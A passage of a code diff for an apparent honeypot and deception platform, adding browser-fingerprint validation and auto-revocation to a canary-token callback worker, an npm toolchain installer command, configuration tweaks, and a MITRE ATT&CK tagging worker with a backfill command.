+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        log.warning(
+            "canary.seed_baseline_topology: topology %s not found", topology_id,
+        )
+        return []
+
+    out: list[dict[str, Any]] = []
+    for decky in hydrated["deckies"]:
+        cfg = decky.get("decky_config") or {}
+        decky_name = cfg.get("name") or decky.get("name")
+        if not decky_name:
+            continue
+        services = decky.get("services") or []
+        container = resolve_topology_container(topology_id, decky_name, services)
+        # MazeNET deckies don't carry an OS persona today; default to
+        # linux (every base image we ship is Linux).
+        rows = await seed_baseline(
+            decky_name, repo,
+            persona="linux", created_by=created_by, bus=bus,
+            container=container,
+        )
+        for r in rows:
+            r["decky_name"] = decky_name
+            out.append(r)
+    return out
--- a/decnet/canary/worker.py
+++ b/decnet/canary/worker.py
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
 from __future__ import annotations

 import asyncio
+import base64
+import binascii
+import json
 import os
+import time
+import uuid
 from datetime import datetime, timezone
-from typing import Optional
+from typing import Any, Optional

 from fastapi import FastAPI, Request, Response

@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
 )


+# Namespace used by fingerprint generators to derive mint UUID.
+# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
+_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
+
+# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
+# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
+# Not shared across worker restarts or processes — acceptable for MVP.
+_FP_RATE_WINDOW_S = 60
+_FP_RATE_LIMIT = 30
+_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
+
+
+def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
+    key = (token_uuid, src_ip)
+    now = time.monotonic()
+    cutoff = now - _FP_RATE_WINDOW_S
+    bucket = _fp_rate_buckets.get(key, [])
+    bucket = [t for t in bucket if t > cutoff]
+    if len(bucket) >= _FP_RATE_LIMIT:
+        _fp_rate_buckets[key] = bucket
+        return False
+    bucket.append(now)
+    _fp_rate_buckets[key] = bucket
+    return True
+
+
+def _is_valid_fp_shape(fp: dict) -> bool:
+    """Layer B — structural sanity check on a decoded fingerprint blob."""
+    if not isinstance(fp.get("mint"), str) or not fp["mint"]:
+        return False
+    known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
+    present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
+    return present >= 3
+
+
 def _http_base() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")

@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:

    @app.get("/c/{slug}")
    async def callback(slug: str, request: Request) -> Response:
+        raw_nonce = request.query_params.get("k")
+        fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
+        merged_headers = dict(request.headers)
+        if fp_meta:
+            merged_headers.update(fp_meta)
        await _record_hit(
            repo, bus,
            slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
            user_agent=request.headers.get("user-agent"),
            request_path=str(request.url.path),
            dns_qname=None,
-            raw_headers=dict(request.headers),
+            raw_headers=merged_headers,
+            parsed_fp=parsed_fp,
+            raw_nonce=raw_nonce,
        )
        # Always 200 with a tiny image so the attacker's client sees
        # a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    return app


+# Per-chunk size cap.  Real fingerprints fit in one ~3KB GET; honest
+# overflow is handled via chunking (s/i/n + d).  Anything larger than
+# this on a single request is junk, so we drop it instead of letting an
+# attacker inflate a trigger row indefinitely.
+_FP_CHUNK_MAX = 8 * 1024
+
+
+def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
+    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).
+
+    The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
+
+    * ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
+    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
+    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
+
+    Returns a tuple of:
+    - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
+    - ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
+      when there's no ``?d=`` or decoding fails.
+    """
+    out: dict[str, Any] = {}
+    parsed_fp: Optional[dict] = None
+    if not qp:
+        return out, parsed_fp
+    o = qp.get("o") if hasattr(qp, "get") else None
+    if o:
+        out["_fp_open"] = "1"
+    d = qp.get("d") if hasattr(qp, "get") else None
+    if not d:
+        return out, parsed_fp
+    if len(d) > _FP_CHUNK_MAX:
+        out["_fp_oversize"] = "1"
+        return out, parsed_fp
+
+    sid = qp.get("s")
+    idx = qp.get("i")
+    total = qp.get("n")
+    if sid and idx and total:
+        out["_fp_sid"] = sid
+        out["_fp_idx"] = idx
+        out["_fp_total"] = total
+        out["_fp_chunk"] = d
+        return out, parsed_fp
+
+    # Single-shot: decode and pass back as parsed_fp; validation runs in
+    # _record_hit after token lookup so we have the stored nonce at hand.
+    try:
+        padded = d + "=" * (-len(d) % 4)
+        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
+        parsed = json.loads(raw.decode("utf-8"))
+    except (binascii.Error, ValueError, UnicodeDecodeError):
+        out["_fp_decode_error"] = "1"
+        return out, parsed_fp
+    if isinstance(parsed, dict):
+        parsed_fp = parsed
+    else:
+        out["_fp_decode_error"] = "1"
+    return out, parsed_fp
+
+
 def _client_ip(request: Request) -> str:
    # Honor X-Forwarded-For if the operator deployed behind a reverse
    # proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
    request_path: Optional[str],
    dns_qname: Optional[str],
    raw_headers: Optional[dict],
+    parsed_fp: Optional[dict] = None,
+    raw_nonce: Optional[str] = None,
 ) -> None:
    """Resolve slug -> token, persist a trigger, publish on the bus.

    Unknown slugs are silently swallowed: returning the same response
    for known and unknown slugs is the stealth posture, and persisting
    every random scan would clutter the DB.
+
+    When *parsed_fp* is present (single-shot fingerprint decode succeeded),
+    it is validated through four layers before being merged into raw_headers:
+    A) nonce match against CanaryToken.fingerprint_nonce,
+    B) structural shape check,
+    C) mint UUID consistency,
+    D) per-(token, IP) rate limit.
+    Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
+    The trigger row always lands regardless — the GET hit is itself forensic.
    """
    token = await repo.get_canary_token_by_slug(slug)
    if token is None:
        return
+
+    final_headers: dict[str, Any] = dict(raw_headers or {})
+
+    if parsed_fp is not None:
+        stored_nonce: Optional[str] = token.get("fingerprint_nonce")
+
+        # Layer A — nonce
+        if stored_nonce is not None and raw_nonce != stored_nonce:
+            final_headers["_fp_invalid_nonce"] = "1"
+            parsed_fp = None
+
+        # Layer B — shape (only when nonce passed or no nonce enforced)
+        if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
+            final_headers["_fp_invalid_shape"] = "1"
+            parsed_fp = None
+
+        # Layer C — mint UUID consistency
+        if parsed_fp is not None:
+            expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
+            if parsed_fp.get("mint") != expected_mint:
+                final_headers["_fp_invalid_mint"] = "1"
+                parsed_fp = None
+
+        # Layer D — rate limit
+        if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
+            final_headers["_fp_rate_limited"] = "1"
+            parsed_fp = None
+
+        if parsed_fp is not None:
+            final_headers["_fp"] = parsed_fp
+
    trigger_id = await repo.record_canary_trigger({
        "token_uuid": token["uuid"],
        "occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
        "user_agent": user_agent,
        "request_path": request_path,
        "dns_qname": dns_qname,
-        "raw_headers": raw_headers or {},
+        "raw_headers": final_headers,
    })
    try:
        await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
    except Exception as e:  # noqa: BLE001 — best effort
        log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)

+    # Auto-deregister fingerprint canaries after the first valid fingerprint
+    # is collected. Slug goes dark; the stealth posture means the attacker
+    # sees the same 200 + GIF on the next hit — nothing reveals the revocation.
+    # Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
+    # http/dns canaries are NOT auto-revoked.
+    if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
+        try:
+            await repo.update_canary_token_state(token["uuid"], "revoked")
+            await bus.publish(
+                topics.canary(token["uuid"], topics.CANARY_REVOKED),
+                {"token_id": token["uuid"], "trigger_id": trigger_id,
+                 "reason": "fingerprint_collected"},
+            )
+        except Exception as e:  # noqa: BLE001 — trigger row already landed; best effort
+            log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
+

 # ---------------------------- DNS surface --------------------------------

@@ -214,7 +380,7 @@ async def _start_dns_server(
        local_addr=(_dns_bind(), _dns_port()),
    )
    log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
-    return transport  # type: ignore[return-value]
+    return transport


 # ---------------------------- entry point --------------------------------
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -39,6 +39,7 @@ from . import (
    swarm,
    swarmctl,
    topology,
+    ttp,
    updater,
    web,
    webhook,
@@ -59,7 +60,7 @@ for _mod in (
    swarm,
    deploy, lifecycle, workers, inventory,
    web, profiler, orchestrator, realism, reconciler, sniffer, db,
-    topology, bus, geoip, init, webhook, canary,
+    topology, bus, geoip, init, webhook, canary, ttp,
 ):
    _mod.register(app)

--- a/decnet/cli/canary.py
+++ b/decnet/cli/canary.py
@@ -1,8 +1,13 @@
 """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.

-Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
-``@app.command(name="canary")`` Typer entry point that delegates to
-:func:`decnet.canary.worker.run`.
+Two entry points share this module:
+
+* ``decnet canary`` — runs the worker process. Mirrors the shape of
+  :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
+  systemd unit so its argv must stay stable.
+* ``decnet canary-install-toolchain`` — provisions the Node side of
+  the fingerprint-canary obfuscator. Idempotent; safe to call from
+  the API service unit's ``ExecStartPre``.

 Not master-only — any host that hosts deckies can run its own
 canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
 """
 from __future__ import annotations

+import shutil
+import subprocess  # nosec B404 — npm exec is the whole point of the toolchain installer
+from pathlib import Path
+
 import typer

 from . import utils as _utils
 from .utils import console, log

+_TOOLCHAIN_TIMEOUT_S = 180
+

 def register(app: typer.Typer) -> None:
    @app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
            asyncio.run(run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Canary worker stopped.[/]")
+
+    @app.command(name="canary-install-toolchain")
+    def canary_install_toolchain(
+        npm_bin: str = typer.Option(
+            "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
+        ),
+    ) -> None:
+        """Install the Node-side toolchain used by fingerprint canaries.
+
+        Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
+        directory so the obfuscator's helper script can ``require()``
+        ``javascript-obfuscator`` at mint time. Requires Node >= 18.
+
+        Idempotent: re-running on an already-installed tree is fast
+        (npm short-circuits when ``node_modules/`` is up-to-date).
+        """
+        import decnet.canary as _canary_pkg
+        canary_dir = Path(_canary_pkg.__file__).resolve().parent
+        if not (canary_dir / "package.json").is_file():
+            console.print(
+                f"[red]canary package.json not found under {canary_dir}; "
+                "wheel may be missing the JS toolchain payload.[/]"
+            )
+            raise typer.Exit(code=2)
+        if shutil.which(npm_bin) is None:
+            console.print(
+                f"[red]npm executable {npm_bin!r} not found on PATH. "
+                "Install Node >= 18 and re-run.[/]"
+            )
+            raise typer.Exit(code=2)
+        console.print(
+            f"[cyan]installing canary toolchain[/] in {canary_dir}",
+        )
+        try:
+            proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
+                [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
+                cwd=str(canary_dir),
+                capture_output=True, text=True,
+                timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
+            )
+        except subprocess.TimeoutExpired:
+            console.print("[red]npm install timed out after 3 minutes[/]")
+            raise typer.Exit(code=3) from None
+        if proc.returncode != 0:
+            console.print(
+                f"[red]npm install failed rc={proc.returncode}[/]\n"
+                f"{proc.stderr.strip()}"
+            )
+            raise typer.Exit(code=proc.returncode)
+        console.print("[green]canary toolchain ready[/]")
--- a/decnet/cli/gating.py
+++ b/decnet/cli/gating.py
@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
    "mutate", "listener", "profiler",
    "services", "distros", "correlate", "archetypes", "web",
    "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
+    # `ttp` runs on agents — local SMTP decoys persist .eml files into the
+    # agent's artifacts tree and the EmailLifter disk-reaches them in-process
+    # (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
+    "ttp-backfill",
 })
 MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
    {"swarm", "topology", "geoip", "realism"}
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
        return
    _app.registered_commands = [
        c for c in _app.registered_commands
-        if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
+        if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
    ]
    _app.registered_groups = [
        g for g in _app.registered_groups
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
 # EnvironmentFile= — never in a group-readable INI.

 [decnet]
+# DECNET-service user/group as configured at `decnet init` time.
+# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
+# so the same user name can have different numeric uids on master vs
+# agents without breaking artifact ownership.
+api-user = {api_user}
+api-group = {api_group}
 # mode = master                          # or "agent"

 # [api]
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
 # master-host = 10.0.0.1
 # syslog-port = 6514
 # swarmctl-port = 8770
+# swarmctl-host = 127.0.0.1

 # [logging]
 # system-log = /var/log/decnet/decnet.system.log
@@ -197,14 +204,17 @@ def _ensure_dir(
    return f"skip: {path} already present" if existed else "ok"


-def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
+def _ensure_config(
+    path: Path, group: str, *, user: str, dry_run: bool,
+) -> str:
    if path.exists():
        return f"skip: {path} already present"
    if dry_run:
        console.print(f"  [dim]would write:[/] {path}")
        return "ok"
    path.parent.mkdir(parents=True, exist_ok=True)
-    path.write_text(_CONFIG_PLACEHOLDER)
+    rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
+    path.write_text(rendered)
    try:
        os.chmod(path, 0o640)
        gid = grp.getgrnam(group).gr_gid
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
        # (Path("/").  / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
        _install_rel = install_dir.lstrip("/")

-        required_tools = ("systemctl",) if deinit else (
+        required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
            "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
        )
        if deinit:
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
            )
            _step(
                "systemctl daemon-reload",
-                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
+                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
            )
            _step(
                f"remove {etc_decnet / 'decnet.ini'}",
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
            (pfx / _install_rel, 0o755, user, group),
            (pfx / "var/lib/decnet", 0o750, user, group),
            (pfx / "var/lib/decnet/geoip", 0o755, user, group),
+            # DEBT-035 / DEBT-047: artifact root carries setgid (the
+            # 0o2... bit) so every file written under it inherits the
+            # decnet group regardless of which container's uid created
+            # it. Group-write (0o2775) lets the API process and the
+            # local TTP worker read each other's outputs without a
+            # manual chown after every fresh deploy.
+            (pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
            (pfx / "var/log/decnet", 0o750, user, group),
            (etc_decnet, 0o755, "root", group),
            (pfx / "run/decnet", 0o755, "root", group),
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
        for path, mode, d_owner, d_group in dirs:
            _step(
                f"ensure dir {path}",
-                lambda p=path, m=mode, o=d_owner, g=d_group:
+                lambda p=path, m=mode, o=d_owner, g=d_group:  # type: ignore[misc]
                    _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
            )
        _step(
            f"write {etc_decnet / 'decnet.ini'}",
-            lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
+            lambda: _ensure_config(
+                etc_decnet / "decnet.ini", group,
+                user=user, dry_run=dry_run,
+            ),
        )
        _step(
            "install systemd units",
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
        )
        _step(
            "systemctl daemon-reload",
-            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
+            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
        )

        if no_start:
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
            _step(
                "systemctl enable --now decnet.target",
                lambda: (
-                    _run(
+                    _run(  # type: ignore[func-returns-value]
                        ["systemctl", "enable", "--now", "decnet.target"],
                        dry_run=dry_run,
                    ),
--- a/decnet/cli/swarmctl.py
+++ b/decnet/cli/swarmctl.py
@@ -16,8 +16,16 @@ from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def swarmctl(
-        port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
-        host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
+        port: int = typer.Option(
+            8770, "--port",
+            envvar="DECNET_SWARMCTL_PORT",
+            help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
+        ),
+        host: str = typer.Option(
+            "127.0.0.1", "--host",
+            envvar="DECNET_SWARMCTL_HOST",
+            help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
+        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
        tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
--- a/decnet/cli/topology.py
+++ b/decnet/cli/topology.py
@@ -233,8 +233,8 @@ def _delete(
        topo = await repo.get_topology(topology_id)
        if topo is None:
            return False, "not-found"
-        if topo["status"] in _RUNNING:
-            return False, str(topo["status"])
+        if topo.status in _RUNNING:
+            return False, str(topo.status)
        ok = await repo.delete_topology_cascade(topology_id)
        return ok, None

--- a/decnet/cli/ttp.py
+++ b/decnet/cli/ttp.py
@@ -0,0 +1,309 @@
+"""``decnet ttp`` — TTP-tagging worker and admin commands.
+
+Two flat commands share this module:
+
+* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
+  ``attacker.session.ended`` / ``attacker.observed`` /
+  ``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
+  ``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
+  dispatches each event through :class:`CompositeTagger` (RuleEngine +
+  Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
+  lifters), persists ``ttp_tag`` rows via the idempotent
+  ``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
+  ``ttp.rule.fired.<technique_id>`` only when the insert returned a
+  non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
+  §"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
+  so its argv must stay stable.
+
+* ``decnet ttp-backfill`` — replays historical events (shell commands
+  recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
+  through the live tagger. Writes ``ttp_tag`` rows using the same
+  idempotent insert path. **Does not publish** to the bus — replay must
+  not re-trigger SIEM/webhook fan-out on already-attributed events.
+
+Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
+:mod:`decnet.cli.gating`.
+"""
+from __future__ import annotations
+
+import asyncio
+import time
+from datetime import datetime, timedelta, timezone
+from typing import Any
+
+import typer
+
+from decnet.ttp.factory import CompositeTagger, get_tagger
+
+from . import utils as _utils
+from .utils import console, log
+
+
+_BACKFILL_SOURCES = ("command", "canary", "all")
+
+
+def register(app: typer.Typer) -> None:
+    @app.command(name="ttp")
+    def ttp(
+        poll_interval_secs: float = typer.Option(
+            60.0, "--poll-interval", "-i",
+            help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
+        ),
+        daemon: bool = typer.Option(
+            False, "--daemon", "-d",
+            help="Detach to background as a daemon process",
+        ),
+    ) -> None:
+        """TTP-tagging worker — MITRE ATT&CK technique tagging."""
+        from decnet.ttp.worker import run_ttp_worker_loop
+        from decnet.web.dependencies import repo
+
+        if daemon:
+            log.info("ttp daemonizing poll=%s", poll_interval_secs)
+            _utils._daemonize()
+
+        log.info("ttp command invoked poll=%s", poll_interval_secs)
+        console.print(
+            f"[bold cyan]TTP tagging worker starting[/] "
+            f"poll={poll_interval_secs}s"
+        )
+        console.print("[dim]Press Ctrl+C to stop[/]")
+
+        async def _run() -> None:
+            await repo.initialize()
+            await run_ttp_worker_loop(
+                repo, poll_interval_secs=poll_interval_secs,
+            )
+
+        try:
+            asyncio.run(_run())
+        except KeyboardInterrupt:
+            console.print("\n[yellow]TTP tagging worker stopped.[/]")
+
+    @app.command(name="ttp-backfill")
+    def ttp_backfill(
+        since_days: int = typer.Option(
+            7, "--since-days", "-s",
+            min=1, max=3650,
+            help="Replay events whose source row is newer than N days ago.",
+        ),
+        source: str = typer.Option(
+            "all", "--source",
+            help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
+        ),
+        dry_run: bool = typer.Option(
+            False, "--dry-run",
+            help="Run the tagger but skip insert_tags. Reports counts only.",
+        ),
+        batch_size: int = typer.Option(
+            500, "--batch-size",
+            min=1, max=100_000,
+            help="Number of tags accumulated before each repo.insert_tags call.",
+        ),
+    ) -> None:
+        """Replay historical attacker activity through the live tagger.
+
+        Walks ``Attacker.commands`` (per-IP shell-command history) and
+        ``CanaryTrigger`` (canary callback log) since N days ago,
+        builds the same :class:`TaggerEvent` shape the live worker
+        emits, and persists tags via the idempotent INSERT OR IGNORE
+        write. Re-running is safe — a second pass over identical
+        source rows reports ``inserted=0``.
+
+        Bus publish is intentionally suppressed; SIEM / webhook fan-out
+        sees only live events, never replays.
+        """
+        from decnet.cli.gating import _require_master_mode
+        from decnet.web.dependencies import repo
+
+        _require_master_mode("ttp-backfill")
+
+        if source not in _BACKFILL_SOURCES:
+            console.print(
+                f"[red]invalid --source {source!r}; expected one of "
+                f"{_BACKFILL_SOURCES}[/]"
+            )
+            raise typer.Exit(code=2)
+
+        cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
+        console.print(
+            f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
+            f"source={source} dry_run={dry_run} batch_size={batch_size}"
+        )
+
+        async def _run() -> None:
+            await repo.initialize()
+            await _backfill(
+                repo,
+                cutoff=cutoff,
+                sources=_resolve_sources(source),
+                dry_run=dry_run,
+                batch_size=batch_size,
+            )
+
+        try:
+            asyncio.run(_run())
+        except KeyboardInterrupt:
+            console.print("\n[yellow]Backfill interrupted.[/]")
+
+
+def _resolve_sources(name: str) -> tuple[str, ...]:
+    if name == "all":
+        return ("command", "canary")
+    return (name,)
+
+
+async def _backfill(
+    repo: Any,
+    *,
+    cutoff: datetime,
+    sources: tuple[str, ...],
+    dry_run: bool,
+    batch_size: int,
+) -> None:
+    """Drive the per-source backfill loops and report structured counts.
+
+    One :class:`CompositeTagger` is built once and reused for every
+    source — the per-lifter watch fan-out the live worker performs is
+    inlined here as a `watch_store()` startup task per
+    :class:`WatchableTagger`, so the dispatch indexes hydrate before
+    we start feeding events.
+    """
+    # Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
+    # to inject a recording fake without touching the global factory.
+    tagger = get_tagger()
+    watch_tasks: list[asyncio.Task[None]] = []
+    if isinstance(tagger, CompositeTagger):
+        for watchable in tagger.iter_watchables():
+            watch_tasks.append(asyncio.create_task(watchable.watch_store()))
+    # Yield once so each watch_store gets a chance to run its
+    # initial `load_compiled` before we feed the first event.
+    await asyncio.sleep(0.05)
+
+    try:
+        if "command" in sources:
+            await _backfill_commands(
+                repo, tagger, cutoff=cutoff,
+                dry_run=dry_run, batch_size=batch_size,
+            )
+        if "canary" in sources:
+            await _backfill_canaries(
+                repo, tagger, cutoff=cutoff,
+                dry_run=dry_run, batch_size=batch_size,
+            )
+    finally:
+        for task in watch_tasks:
+            task.cancel()
+        for task in watch_tasks:
+            try:
+                await task
+            except (asyncio.CancelledError, Exception):  # noqa: BLE001
+                pass
+
+
+async def _backfill_commands(
+    repo: Any,
+    tagger: Any,
+    *,
+    cutoff: datetime,
+    dry_run: bool,
+    batch_size: int,
+) -> None:
+    from decnet.ttp.base import TaggerEvent
+
+    started = time.monotonic()
+    rows_seen = 0
+    cmds_seen = 0
+    inserted = 0
+    pending: list[Any] = []
+
+    async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
+        rows_seen += 1
+        for idx, cmd in enumerate(commands):
+            cmds_seen += 1
+            text = cmd.get("command_text") or cmd.get("text")
+            if not isinstance(text, str):
+                continue
+            cmd_id = (
+                cmd.get("id")
+                or cmd.get("uuid")
+                or cmd.get("command_id")
+                or f"{attacker.uuid}#cmd{idx}"
+            )
+            event = TaggerEvent(
+                source_kind="command",
+                source_id=str(cmd_id),
+                attacker_uuid=attacker.uuid,
+                identity_uuid=getattr(attacker, "identity_id", None),
+                session_id=cmd.get("session_id"),
+                decky_id=cmd.get("decky_id") or cmd.get("decky"),
+                payload={**cmd, "command_text": text},
+            )
+            tags = await tagger.tag(event)
+            if tags:
+                pending.extend(tags)
+            if len(pending) >= batch_size:
+                inserted += await _flush(repo, pending, dry_run)
+                pending = []
+    if pending:
+        inserted += await _flush(repo, pending, dry_run)
+    elapsed = time.monotonic() - started
+    console.print(
+        f"source=command rows={rows_seen} commands={cmds_seen} "
+        f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
+    )
+
+
+async def _backfill_canaries(
+    repo: Any,
+    tagger: Any,
+    *,
+    cutoff: datetime,
+    dry_run: bool,
+    batch_size: int,
+) -> None:
+    from decnet.ttp.base import TaggerEvent
+
+    started = time.monotonic()
+    rows_seen = 0
+    inserted = 0
+    pending: list[Any] = []
+
+    async for trigger in repo.iter_canary_triggers_since(cutoff):
+        rows_seen += 1
+        event = TaggerEvent(
+            source_kind="canary_fingerprint",
+            source_id=trigger.uuid,
+            attacker_uuid=trigger.attacker_id,
+            identity_uuid=None,
+            session_id=None,
+            decky_id=None,
+            payload={
+                "token_uuid": trigger.token_uuid,
+                "src_ip": trigger.src_ip,
+                "ua_signature": trigger.user_agent or "",
+                "user_agent": trigger.user_agent,
+                "request_path": trigger.request_path,
+                "dns_qname": trigger.dns_qname,
+                "headers": trigger.headers(),
+            },
+        )
+        tags = await tagger.tag(event)
+        if tags:
+            pending.extend(tags)
+        if len(pending) >= batch_size:
+            inserted += await _flush(repo, pending, dry_run)
+            pending = []
+    if pending:
+        inserted += await _flush(repo, pending, dry_run)
+    elapsed = time.monotonic() - started
+    console.print(
+        f"source=canary rows={rows_seen} inserted={inserted} "
+        f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
+    )
+
+
+async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
+    if dry_run:
+        return 0
+    return int(await repo.insert_tags(tags))
--- a/decnet/cli/utils.py
+++ b/decnet/cli/utils.py
@@ -11,7 +11,7 @@ import signal
 import subprocess  # nosec B404
 import sys
 from pathlib import Path
-from typing import Optional
+from typing import Any, Callable, Optional

 import typer
 from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
    return None


-def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
+def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
    """Return the microservice registry for health-check and relaunch.

    On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"


 def _swarmctl_base_url(url: Optional[str]) -> str:
-    return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
+    return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL


 def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
--- a/decnet/cli/workers.py
+++ b/decnet/cli/workers.py
@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
        except KeyboardInterrupt:
            console.print("\n[yellow]Reuse correlator stopped.[/]")

+    @app.command(name="attribution")
+    def attribution(
+        multi_actor_tick_secs: float = typer.Option(
+            60.0, "--multi-actor-tick", "-t",
+            help=(
+                "Cross-primitive multi_actor correlator tick interval (seconds). "
+                "Walks attribution_state for identities flagged on >= 2 "
+                "primitives and emits attribution.profile.multi_actor_suspected."
+            ),
+        ),
+        daemon: bool = typer.Option(
+            False, "--daemon", "-d",
+            help="Detach to background as a daemon process",
+        ),
+    ) -> None:
